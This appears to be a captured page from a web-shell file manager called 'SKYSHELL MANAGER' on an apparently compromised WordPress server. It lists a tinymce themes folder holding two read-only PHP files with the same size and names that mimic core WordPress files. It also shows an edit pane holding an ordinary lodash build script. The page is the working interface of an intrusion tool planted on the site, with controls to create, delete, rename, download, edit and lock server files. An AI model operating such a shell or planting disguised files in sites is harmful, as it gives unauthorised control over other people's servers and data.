📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: build-dist.js
'use strict'; const async = require('async'); const path = require('path'); const file = require('../common/file'); const util = require('../common/util'); const basePath = path.join(__dirname, '..', '..'); const distPath = path.join(basePath, 'dist'); const filename = 'lodash.js'; const baseLodash = path.join(basePath, filename); const distLodash = path.join(distPath, filename); /*----------------------------------------------------------------------------*/ /** * Creates browser builds of Lodash at the `target` path. * * @private * @param {string} target The output directory path. */ function build() { async.series([ file.copy(baseLodash, distLodash), file.min(distLodash) ], util.pitch); } build();
Save